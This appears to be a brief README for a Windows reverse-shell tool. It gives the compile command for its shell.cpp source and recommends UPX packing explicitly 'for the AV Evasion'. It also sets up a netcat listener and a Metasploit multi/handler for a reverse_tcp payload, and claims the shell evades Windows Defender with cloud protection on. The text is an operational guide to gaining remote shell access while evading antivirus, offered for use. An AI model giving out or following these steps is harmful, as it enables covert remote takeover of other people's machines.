https://twitter.com/whichbuffer/status/1333889053851340805?s=20
https://www.youtube.com/watch?v=4k0Xkf4PuMs
i686-w64-mingw32-g++ shell.cpp -o shell.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
After Compile the exe file then use UPX (https://upx.github.io/) for the AV Evasion
nc -lvnp <port number>
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST <Local IP>
set LPORT <Local Port>
exploit -j -z
Tested on updated(30.11.2020) Windows 10 device with Windows Defender and Cloud Protection enabled.